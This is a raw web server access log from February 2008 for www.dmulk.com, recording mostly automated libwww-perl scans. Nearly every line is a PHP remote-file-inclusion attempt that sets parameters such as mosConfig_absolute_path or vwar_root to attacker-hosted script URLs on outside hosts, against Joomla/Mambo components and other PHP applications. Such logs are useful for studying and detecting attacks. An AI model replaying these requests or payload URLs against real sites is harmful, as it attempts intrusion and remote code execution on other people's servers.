89.248.101.69 - - [25/Feb/2008:04:41:09 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:41:10 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:41:42 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:41:43 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:42:09 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:04:42:39 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:04:42:39 -0800] "GET /logs/?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 200 36116 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:04:43:01 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:44:28 -0800] "GET /logs/access_080107.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:44:30 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:44:30 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:44:30 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.217 - - [25/Feb/2008:04:44:39 -0800] "GET /logs/access_080217.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.58.130 - - [25/Feb/2008:04:44:56 -0800] "GET /logs/access.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.58.130 - - [25/Feb/2008:04:44:56 -0800] "GET //index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.58.130 - - [25/Feb/2008:04:44:56 -0800] "GET /logs//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:04:45:01 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
200.29.0.28 - - [25/Feb/2008:04:45:01 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:04:45:02 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.96 - - [25/Feb/2008:04:46:06 -0800] "GET /logs/access_080211.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:47:07 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:47:07 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:47:08 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:47:08 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:47:08 -0800] "GET /index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:47:08 -0800] "GET /logs/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:47:37 -0800] "GET /logs/access_080117.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:04:47:50 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:47:59 -0800] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:47:59 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:47:59 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.131.171.231 - - [25/Feb/2008:04:48:22 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.171.231 - - [25/Feb/2008:04:48:22 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.171.231 - - [25/Feb/2008:04:48:22 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:48:22 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:48:22 -0800] "GET /index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:48:23 -0800] "GET /logs/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.131.171.231 - - [25/Feb/2008:04:48:29 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.171.231 - - [25/Feb/2008:04:48:30 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:48:30 -0800] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:48:30 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:48:30 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.131.171.231 - - [25/Feb/2008:04:48:30 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:48:51 -0800] "GET /logs/access_080117.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
67.18.58.130 - - [25/Feb/2008:04:48:54 -0800] "GET /logs/access.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.58.130 - - [25/Feb/2008:04:48:55 -0800] "GET //index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.58.130 - - [25/Feb/2008:04:48:55 -0800] "GET /logs//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.58.130 - - [25/Feb/2008:04:49:16 -0800] "GET /logs/access_080120.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:04:49:32 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:04:49:32 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:49:34 -0800] "GET //update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:49:34 -0800] "GET /logs//update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
85.131.171.231 - - [25/Feb/2008:04:50:06 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.171.231 - - [25/Feb/2008:04:50:08 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:50:25 -0800] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:50:29 -0800] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.33.241 - - [25/Feb/2008:04:50:32 -0800] "GET /logs/access.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.33.241 - - [25/Feb/2008:04:50:32 -0800] "GET //index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.33.241 - - [25/Feb/2008:04:50:32 -0800] "GET /logs//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.33.241 - - [25/Feb/2008:04:50:49 -0800] "GET /logs/access_080120.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:50:53 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:04:51:35 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:04:51:35 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:51:35 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:51:36 -0800] "GET /logs/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 200 36116 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:51:41 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:51:44 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:51:44 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:51:44 -0800] "GET /logs/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 200 36116 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:52:00 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:52:09 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.164.143 - - [25/Feb/2008:04:52:32 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://img.mehriz.org/image/img/86b932fa9ed6cadc7bb3766f57f03a2b/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.143 - - [25/Feb/2008:04:52:32 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://img.mehriz.org/image/img/86b932fa9ed6cadc7bb3766f57f03a2b/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:52:38 -0800] "GET /logs/access_080201.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:52:46 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:52:48 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:52:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.230.110.130 - - [25/Feb/2008:04:53:10 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:04:53:40 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:04:53:42 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:54:58 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:04:55:23 -0800] "GET //components/com_simpleboard/modifyform.html?code=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:04:55:29 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.214.191 - - [25/Feb/2008:04:55:38 -0800] "GET /logs/access_071230.log//cart_content.php?cart_isp_root=http://www.nieuw-solutions.com/fotos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.214.191 - - [25/Feb/2008:04:55:38 -0800] "GET /logs//cart_content.php?cart_isp_root=http://www.nieuw-solutions.com/fotos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.214.191 - - [25/Feb/2008:04:55:44 -0800] "GET /logs/access.log//cart_content.php?cart_isp_root=http://www.nieuw-solutions.com/fotos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:55:48 -0800] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:55:48 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.6.19.219 - - [25/Feb/2008:04:55:49 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:04:55:49 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:57:12 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:57:13 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:57:17 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:57:18 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:57:21 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:04:57:21 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:04:57:37 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:04:57:37 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [25/Feb/2008:04:57:37 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.73 - - [25/Feb/2008:04:57:54 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:04:57:57 -0800] "GET //components/com_simpleboard/error.php?dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:04:58:12 -0800] "GET //components/com_simpleboard/admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.143 - - [25/Feb/2008:04:59:18 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://img.mehriz.org/image/img/86b932fa9ed6cadc7bb3766f57f03a2b/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:59:58 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:04:59:59 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:05:00:31 -0800] "GET /logs/classes/core/language.php?rootdir=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:05:00:31 -0800] "GET /classes/core/language.php?rootdir=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:05:01:42 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:05:01:42 -0800] "GET /?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:05:01:43 -0800] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 200 36116 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [25/Feb/2008:05:02:10 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://h1.ripway.com/frizza/Mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:05:02:21 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:05:02:21 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:05:02:21 -0800] "GET /logs/access_080122.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:05:02:21 -0800] "GET /logs/access_080122.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
